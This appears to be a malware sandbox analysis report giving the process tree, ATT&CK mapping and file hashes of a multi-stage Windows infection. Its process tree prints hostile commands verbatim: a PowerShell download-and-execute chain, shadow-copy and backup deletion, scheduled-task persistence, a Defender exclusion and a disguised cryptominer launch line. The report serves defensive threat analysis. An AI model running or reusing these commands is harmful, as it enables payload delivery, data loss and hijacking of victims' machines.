PID 3016 wrote to memory of 3464	3016		90
PID 3016 wrote to memory of 3464	3016		90
PID 3016 wrote to memory of 3464	3016		90
PID 3016 wrote to memory of 2696	3016		91
PID 3016 wrote to memory of 2696	3016		91
PID 3016 wrote to memory of 2696	3016		91
PID 3016 wrote to memory of 1844	3016		92
PID 3016 wrote to memory of 1844	3016		92
PID 3016 wrote to memory of 1844	3016		92
PID 3016 wrote to memory of 1844	3016		92
PID 3016 wrote to memory of 2260	3016		93
PID 3016 wrote to memory of 2260	3016		93
PID 3016 wrote to memory of 2260	3016		93
PID 3748 wrote to memory of 3088	3748	cmd.exe	94
PID 3748 wrote to memory of 3088	3748	cmd.exe	94
PID 3016 wrote to memory of 1376	3016		95
PID 3016 wrote to memory of 1376	3016		95
PID 3016 wrote to memory of 1376	3016		95
PID 3016 wrote to memory of 1376	3016		95
PID 3016 wrote to memory of 4040	3016		96
PID 3016 wrote to memory of 4040	3016		96
PID 3016 wrote to memory of 4040	3016		96
PID 3016 wrote to memory of 1872	3016		97
PID 3016 wrote to memory of 1872	3016		97
PID 3016 wrote to memory of 1872	3016		97
PID 3016 wrote to memory of 1872	3016		97
PID 3748 wrote to memory of 1852	3748	cmd.exe	99
PID 3748 wrote to memory of 1852	3748	cmd.exe	99
PID 3748 wrote to memory of 1212	3748	cmd.exe	100
PID 3748 wrote to memory of 1212	3748	cmd.exe	100
PID 2388 wrote to memory of 1520	2388	svchost.exe	101
PID 2388 wrote to memory of 1520	2388	svchost.exe	101
PID 2388 wrote to memory of 1520	2388	svchost.exe	101

C:\Users\Admin\AppData\Local\Temp\d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe
"C:\Users\Admin\AppData\Local\Temp\d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3128
- C:\Users\Admin\AppData\Local\Temp\d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe
  "C:\Users\Admin\AppData\Local\Temp\d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3224

C:\Users\Admin\AppData\Local\Temp\2DF6.exe
C:\Users\Admin\AppData\Local\Temp\2DF6.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2952
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Suspicious use of WriteProcessMemory
  PID:2388
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    3⤵
    PID:1520
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2856
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:3756
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    3⤵
    PID:2300
  - - C:\Windows\SysWOW64\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:1852
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 0
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:484

C:\Users\Admin\AppData\Local\Temp\302A.exe
C:\Users\Admin\AppData\Local\Temp\302A.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4080

C:\Users\Admin\AppData\Local\Temp\3192.exe
C:\Users\Admin\AppData\Local\Temp\3192.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2072
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630257393/download', '%Temp%\\WindowsHost.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630257468/download', '%Temp%\\WindowsAPI.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630258463/download', '%Temp%\\svhost.exe') & powershell Start-Process -FilePath '%Temp%\\WindowsHost.exe' & powershell Start-Process -FilePath '%Temp%\\WindowsAPI.exe' & powershell Start-Process -FilePath '%Temp%\\svhost.exe' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630257393/download', 'C:\Users\Admin\AppData\Local\Temp\\WindowsHost.exe')
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of AdjustPrivilegeToken
    PID:1544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630257468/download', 'C:\Users\Admin\AppData\Local\Temp\\WindowsAPI.exe')
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of AdjustPrivilegeToken
    PID:3088
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630258463/download', 'C:\Users\Admin\AppData\Local\Temp\\svhost.exe')
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of AdjustPrivilegeToken
    PID:1852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\WindowsHost.exe'
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1212
  - - C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
      "C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"
      4⤵
      Executes dropped EXE
      PID:3928
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "SafeWindows" /tr '"C:\Users\Admin\AppData\Roaming\SafeWindows.exe"' & exit
        5⤵
        
        PID:736
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "SafeWindows" /tr '"C:\Users\Admin\AppData\Roaming\SafeWindows.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:3556
    - - C:\Users\Admin\AppData\Roaming\SafeWindows.exe
        
        "C:\Users\Admin\AppData\Roaming\SafeWindows.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3880
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "SafeWindows" /tr '"C:\Users\Admin\AppData\Roaming\SafeWindows.exe"' & exit
        6⤵
        
        PID:3356
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "SafeWindows" /tr '"C:\Users\Admin\AppData\Roaming\SafeWindows.exe"'
        7⤵
        Creates scheduled task(s)
        
        PID:2100
      - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        6⤵
        Executes dropped EXE
        
        PID:2268
      - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=info.displaypluginwatchdog.xyz --user=43x1GMVXBpY6gd46aqN5VCTYWDmZjYk2zVYZVYb4zvBpCuAMcocaackDDL5wirHTQwbZoAGmLjB9H2wuBhKFVVdJLDmb8Fe --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth
        6⤵
        
        PID:896
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\WindowsAPI.exe'
    3⤵
    PID:2180
  - - C:\Users\Admin\AppData\Local\Temp\WindowsAPI.exe
      "C:\Users\Admin\AppData\Local\Temp\WindowsAPI.exe"
      4⤵
      Executes dropped EXE
      PID:3548
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "DriverVideocard" /tr '"C:\Users\Admin\AppData\Roaming\DriverVideocard.exe"' & exit
        5⤵
        
        PID:1188
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "DriverVideocard" /tr '"C:\Users\Admin\AppData\Roaming\DriverVideocard.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:1312
    - - C:\Users\Admin\AppData\Roaming\DriverVideocard.exe
        
        "C:\Users\Admin\AppData\Roaming\DriverVideocard.exe"
        5⤵
        Executes dropped EXE
        
        PID:3916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\svhost.exe'
    3⤵
    PID:2916
  - - C:\Users\Admin\AppData\Local\Temp\svhost.exe
      "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:3472
    - - C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:4080

C:\Users\Admin\AppData\Local\Temp\331A.exe
C:\Users\Admin\AppData\Local\Temp\331A.exe
1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
PID:408
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Wxqzckqsqcvglaedzdxnjkt.vbs"
  2⤵
  PID:1744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Twitch\TwitchUpdate.exe'
    3⤵
    PID:3680
- C:\Users\Admin\AppData\Local\Temp\331A.exe
  C:\Users\Admin\AppData\Local\Temp\331A.exe
  2⤵
  - Executes dropped EXE
  PID:3716
- - C:\Users\Admin\AppData\Local\Temp\331A.exe
    "C:\Users\Admin\AppData\Local\Temp\331A.exe"
    3⤵
    - Executes dropped EXE
    PID:3540

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1872

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4040

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3464

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2696

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1844

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2260

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1376

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4040

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1872

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

MD5
5703edef7cb0f99305a6b18845e0443e

SHA1
fb6f022ebde210306e1a6575462d6451e98af454

SHA256
e4ce02059eb175c30879041d610db7b8798cdf57a4c67afc83c125c2db36e883

SHA512
4631853bda1498ff3cace6a348fd2d6770edd0fec166707c3afebff09644f34e29a7a6dd3e9cb167c40e8b5fa1fbbc80ba26d80b4d939daf56278c276b07ada4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

MD5
888f7457c332ac5e1897316e159f58c1

SHA1
a3047c6e978158dfae29b5735e8131ec1b30703d

SHA256
c2c14652875bfeb1ed529202da6d45eb974acab193c005908cf90b8c5cf3dd41

SHA512
0abdc5f78ade2f56b0f1954adc0479b5dcc88d401bfac95754e7dd80adefe7375a426fd89f81b657ebe9c113092524dcbd1e80c39a4bec51ccd93bc0bc3a5aff

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5
939460925953ce88e1086341b8a11bda

SHA1
06249b891050a9fac128ccfee943aeb5bede1c7b

SHA256
d4da3c5ff04a3b677eb77b1bfedc14e29ebd0d01c476d44a0b1a2366447ab016

SHA512
a8dc3eb58a4a550cc2551463a3d813396caf3f2b65f5b13c8e339a4a32652895ee15c23eb5ba833eca4e7c22331a622657cf5bd64098f0c54e43b4e92fe65f30

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

MD5
e414211885abc6733cd83468dec220de

SHA1
f01cbd5adf8db6c650148e4ae56e02b6d70546b7

SHA256
ccd33665d94d0282615928fe373e03bd3125da1ebcac67ba361636d041bfbdef

SHA512
62599bae1ee85ec085eb787716b56a4233ba2e7181e43fd2461c764ad668ec56930eb1c301757e36af3faeeaddd6921eb0cd5f296cfe343835633ce47e806dbc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

MD5
8b34373189fa1c01e888d3f3761af870

SHA1
6de3b42e3b39b2b7dc497b6558185425dcc7b9ba

SHA256
e215099948fa6ad8ceb3487f76cf2abc7fd03db78c6f81af6b1c6b23ea49db21

SHA512
73ba351bcccb5951e7e690dda158546e32b93a95fec5d067f3fb757b9653fe2d55c07a83def17a1a5774a5622443c916416358ed77026bc7cc5e984bdff62c55

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5
0afe39e20baa857c82b2243b292af459

SHA1
71dc5bdde274c76b942426d91f594ac42851ab66

SHA256
eb5684e2a2d2ff4bb0e473288af7a861247d396408bf2816b6d8e76ae0353416

SHA512
b2763a1104e2aba84fb4f2151c150d58b4a40c8f914f49d55a8b22ce800e30c43b81eae8d030f84bd5782fb03a860f9d7e827c68f7abac61fecbf0e668312e5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\331A.exe.log

MD5
7a67bf079fc4538c83e05c4c8d8fabd7

SHA1
6fed3c6bcb8a0a132818108fd92a2d2b9e9db464

SHA256
f47660253cb61730ed0dd7161e85a4dcc598ea38c9a8ddcbed4c5dd779dfc112

SHA512
e13f5530eb7fde87fc70091e6e51af4f67cc863998059308ce28e693017fce9332fe5d3d90c29efee5fb0616f4f07915d071579c8b7a43c2467e37f5afbbdf24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
42d4b1d78e6e092af15c7aef34e5cf45

SHA1
6cf9d0e674430680f67260194d3185667a2bb77b

SHA256
c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

SHA512
d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svhost.exe.log

MD5
b4f7a6a57cb46d94b72410eb6a6d45a9

SHA1
69f3596ffa027202d391444b769ceea0ae14c5f7

SHA256
23994ebe221a48ea16ebad51ae0d4b47ccd415ae10581f9405e588d4f6c2523b

SHA512
be6da516e54c3a5b33ac2603137a2f8cf8445ff5961dd266faedf3627bae8979953d7ef305538df0151c609917a5b99bf5d023bdd32de50fd5c723950f90db5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DRMDU4BX\R5TMICZF.htm

MD5
b1cd7c031debba3a5c77b39b6791c1a7

SHA1
e5d91e14e9c685b06f00e550d9e189deb2075f76

SHA256
57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

SHA512
d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
d8197646252ce81ac36fa5e0c46a6fda

SHA1
c3bb97a71c9584cdb6a905659342e57670422b78

SHA256
aef71dc13d920b1db979ed773df4ece1fe040650d659e44cf7f48a4d5843340c

SHA512
fb3c05aeec2ace3c86ef292ae0e1f5e6709b57bcdd9bb83b0ad49a6de786efa3b4294b7d033fcba6d3c7ed27db5497b2bf6167df9c919f0ad445d7de51b1afae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
786e724f085fca6711c48bf18a926151

SHA1
2082002b71a46c2a5588329e3d789ae066bd56fe

SHA256
d8c8498eae3428034b2ca12001f2cc0df048dadb24fc744cc8d332eebd3f1777

SHA512
66bd0c1c266580ba9b50bc9adbb80ff212c16bff7f616f0239523aeb94f75b0224a53ec655671bcb2805a71e5cbc2b415c6ba4aa7bcb6ca0b48db4a924288220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
fd2ec346d745f0410d9bffcccc880f82

SHA1
22ca0f015adae915c13e7c13f632416f64b79136

SHA256
6245e4a591d550a4265c004cc20f5cae300e8f352650422d43f5a503e0ce6377

SHA512
f5c4e4bcc49f2bbad88c6ff1fa095e4aa54652a8f3e1df532acf40f142399a2b9fdc355ed05b4b44093062fcf856b7a4fd7b3b88410c8ede02f6d79dfa9b644b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
c694bb9c4df6fd08a95be69558d205c2

SHA1
8a79f132a10ad865906e681ddeef7521c3ab5fb2

SHA256
7dfa0ae3225778e7717bb713fd9625d2134721a6117787386f809759044a98a5

SHA512
52736784ad5c5145bb2f574226a447de71db445cd583c8b8054aad14eaac54a7f48a9efdd47927393586f35ee844514d7c86bc54cd44259cc6165c85c722bfb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
383acf45264c1dcce3e745d55e5573cf

SHA1
c57ffef210fc55ad2bc3f3c2aac06b6a703f8856

SHA256
6dfefa1d4e7adbdb097524c28b01d1a9c6f290c40c7401a5c617b57b6ee13a33

SHA512
8599a31c115cc02496061f61e34a82feb61899fe2d443e1939e52047341809b8437365a33cb32b6ae5c1046b6d829e83bcd356514db23aacc5f7c1018b902ce6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
09732026e519e0f3e3f9e9ff1bd800ba

SHA1
1a6d6140face820912c9a2b0c4d85734299495b4

SHA256
58638da59eaaf04f4a5c50c061baa3150c6057bbbddfda6642e024bf0eea91a7

SHA512
f25cb1cada5e2e1189b44c1e9a9956e27f60ed727fc67f907843add0c280f22fc90a2489f85dcb6e49cff9bfd358b7d20ce54f96db262b377521072365209c1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\2DF6.exe

MD5
e70ceaf1fc7771d3d791aedc0c2068a7

SHA1
97912679527c910bdf4c97265656f4c2527245db

SHA256
0e7b9aae7306cdb8cca2a7fa6552fd6cd03f3e2ab2e2d4ae51dfe325ff2016e5

SHA512
6a4c8a424e87f4a622aa20e4fd37060919cf686c32c0432eea026c12af372ffc6714c6baff46d0590a78fddf62ea7ca3eac3240846e1781d090d3867cfc2cd58

Download Submit
C:\Users\Admin\AppData\Local\Temp\2DF6.exe

MD5
e70ceaf1fc7771d3d791aedc0c2068a7

SHA1
97912679527c910bdf4c97265656f4c2527245db

SHA256
0e7b9aae7306cdb8cca2a7fa6552fd6cd03f3e2ab2e2d4ae51dfe325ff2016e5

SHA512
6a4c8a424e87f4a622aa20e4fd37060919cf686c32c0432eea026c12af372ffc6714c6baff46d0590a78fddf62ea7ca3eac3240846e1781d090d3867cfc2cd58

Download Submit
C:\Users\Admin\AppData\Local\Temp\302A.exe

MD5
3242c783cee6fb3e589e6d3e9bad0281

SHA1
fdbf09b5a42d9a93a6515cf65630b033e0ec8dce

SHA256
71b23e033bd17225d74d832b3a4d243fb4bfc72b7f864248191443d9c1023026

SHA512
d3d06c35c737c190a2939869b126a494c6ec05b6608ffb59b15f09d93a61a23fb28176330c512650c0611bb4155ea1b098be3a157d5a85826635ed6602175994

Download Submit
C:\Users\Admin\AppData\Local\Temp\302A.exe

MD5
3242c783cee6fb3e589e6d3e9bad0281

SHA1
fdbf09b5a42d9a93a6515cf65630b033e0ec8dce

SHA256
71b23e033bd17225d74d832b3a4d243fb4bfc72b7f864248191443d9c1023026

SHA512
d3d06c35c737c190a2939869b126a494c6ec05b6608ffb59b15f09d93a61a23fb28176330c512650c0611bb4155ea1b098be3a157d5a85826635ed6602175994

Download Submit
C:\Users\Admin\AppData\Local\Temp\3192.exe

MD5
9ab35b644a731cfb70491c442487871b

SHA1
c348e1f570057cfb63bad701b0f8815ddf32a2b1

SHA256
536b07924f8cad1b08a0f65167c4ecd31b85ebb3f6d3d724d3d5c197de1a175d

SHA512
54380bf92e805c547f8f59bec37f1fe064fdd6c2d205b48721683049875cee78eecd150b514ac8d36e6a67a0ca0d1ec48c9b316c40b8fb8acc785f0f9ea500e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\3192.exe

MD5
9ab35b644a731cfb70491c442487871b

SHA1
c348e1f570057cfb63bad701b0f8815ddf32a2b1

SHA256
536b07924f8cad1b08a0f65167c4ecd31b85ebb3f6d3d724d3d5c197de1a175d

SHA512
54380bf92e805c547f8f59bec37f1fe064fdd6c2d205b48721683049875cee78eecd150b514ac8d36e6a67a0ca0d1ec48c9b316c40b8fb8acc785f0f9ea500e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\331A.exe

MD5
edb8a8107c77a338d86e911b652e182a

SHA1
0529133671596df3eb68516620cf86649d6f1700

SHA256
a3b70262329151ab5e0b401d058e3ff202088204bfbcb1f54be8b5343e543063

SHA512
472eb32fd1e00c1df6c213f74d28b4db19975678c878c90b54ee336da8b6aabd9ddb405db59d36294adc36f6b6a0bd8571657c8b1ed4e689bddf183a7d1926fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\331A.exe

MD5
edb8a8107c77a338d86e911b652e182a

SHA1
0529133671596df3eb68516620cf86649d6f1700

SHA256
a3b70262329151ab5e0b401d058e3ff202088204bfbcb1f54be8b5343e543063

SHA512
472eb32fd1e00c1df6c213f74d28b4db19975678c878c90b54ee336da8b6aabd9ddb405db59d36294adc36f6b6a0bd8571657c8b1ed4e689bddf183a7d1926fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\331A.exe

MD5
edb8a8107c77a338d86e911b652e182a

SHA1
0529133671596df3eb68516620cf86649d6f1700

SHA256
a3b70262329151ab5e0b401d058e3ff202088204bfbcb1f54be8b5343e543063

SHA512
472eb32fd1e00c1df6c213f74d28b4db19975678c878c90b54ee336da8b6aabd9ddb405db59d36294adc36f6b6a0bd8571657c8b1ed4e689bddf183a7d1926fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\331A.exe

MD5
edb8a8107c77a338d86e911b652e182a

SHA1
0529133671596df3eb68516620cf86649d6f1700

SHA256
a3b70262329151ab5e0b401d058e3ff202088204bfbcb1f54be8b5343e543063

SHA512
472eb32fd1e00c1df6c213f74d28b4db19975678c878c90b54ee336da8b6aabd9ddb405db59d36294adc36f6b6a0bd8571657c8b1ed4e689bddf183a7d1926fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsAPI.exe

MD5
9dbebfb40aa9fdba9c94c13e9aaee095

SHA1
71cf110537941724ea0a417689ff5ed080202b13

SHA256
77d43b383b7683461991994eb77c860b021f52ff655f71c9bf7947abf1522e49

SHA512
f48879fee2c9c564b95c3fefc35e8bbfc42d59370ae6c7e535be809356c1347045c067fbe9f7559a98beaa9c971dd72b75df53bfcb6c9101edbe8f97470b4495

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsAPI.exe

MD5
9dbebfb40aa9fdba9c94c13e9aaee095

SHA1
71cf110537941724ea0a417689ff5ed080202b13

SHA256
77d43b383b7683461991994eb77c860b021f52ff655f71c9bf7947abf1522e49

SHA512
f48879fee2c9c564b95c3fefc35e8bbfc42d59370ae6c7e535be809356c1347045c067fbe9f7559a98beaa9c971dd72b75df53bfcb6c9101edbe8f97470b4495

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe

MD5
c526e33e55e0c885dce278ec4157a16f

SHA1
a04426b43f3b855a5b95673e063e82ea499c87ce

SHA256
e3dad4cd7e5abebfebfbfd9ce374d479345917f9de03425b1ea3e8db1666c7e0

SHA512
bfb6a60fed6ce40043a9e2dc524857a8dfed9ba22d3ac6d9a5f7fc863639c39fe5a53bcec9981be880e2bcfc4bb5fd6065d044963e674a71511d89e37b87135b

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe

MD5
c526e33e55e0c885dce278ec4157a16f

SHA1
a04426b43f3b855a5b95673e063e82ea499c87ce

SHA256
e3dad4cd7e5abebfebfbfd9ce374d479345917f9de03425b1ea3e8db1666c7e0

SHA512
bfb6a60fed6ce40043a9e2dc524857a8dfed9ba22d3ac6d9a5f7fc863639c39fe5a53bcec9981be880e2bcfc4bb5fd6065d044963e674a71511d89e37b87135b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_Wxqzckqsqcvglaedzdxnjkt.vbs

MD5
ea7c89805ef5e4f350d2baa9f12be08c

SHA1
0bc1f500811944e008bbc1962819b81feb43006f

SHA256
44fe998f23cfa19c710a7b6c1cbd5e4666398a047ad4847e7f7fa4c0d673f1f0

SHA512
86cb562984ee1ddc74d0b7a662b2c55d2f50a3a8c3e4a54863fd5c7ee8ec4bb1958b697d0a980bac8068d2dbc5d6acf61aadb7efe8435a9edcddc4039229d0d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\svhost.exe

MD5
35f78f61c23eec05ddd6f2a1287e1c34

SHA1
aae333c6bfe97516b071e047437a4de4437be0ab

SHA256
c9a91b8f2a2d9d310d1ac467c26a226f2cb5ffeee5fad7b76825e40e17c77ce1

SHA512
45cf46f7764e974e4c406f931517b70d1edd56fa1ff4f861601503061d1fcf2e5b5697245dbd06332dca24b9ee389aa08ef2ce0ca38379ebc2215369005e29a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\svhost.exe

MD5
35f78f61c23eec05ddd6f2a1287e1c34

SHA1
aae333c6bfe97516b071e047437a4de4437be0ab

SHA256
c9a91b8f2a2d9d310d1ac467c26a226f2cb5ffeee5fad7b76825e40e17c77ce1

SHA512
45cf46f7764e974e4c406f931517b70d1edd56fa1ff4f861601503061d1fcf2e5b5697245dbd06332dca24b9ee389aa08ef2ce0ca38379ebc2215369005e29a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\svhost.exe

MD5
35f78f61c23eec05ddd6f2a1287e1c34

SHA1
aae333c6bfe97516b071e047437a4de4437be0ab

SHA256
c9a91b8f2a2d9d310d1ac467c26a226f2cb5ffeee5fad7b76825e40e17c77ce1

SHA512
